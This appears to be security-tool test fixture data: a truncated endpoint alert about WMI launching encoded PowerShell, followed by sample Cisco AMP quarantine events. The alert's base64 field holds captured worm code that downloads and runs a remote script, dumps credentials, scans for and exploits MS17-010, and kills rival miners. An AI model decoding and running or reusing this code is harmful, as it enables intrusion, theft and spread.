dgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 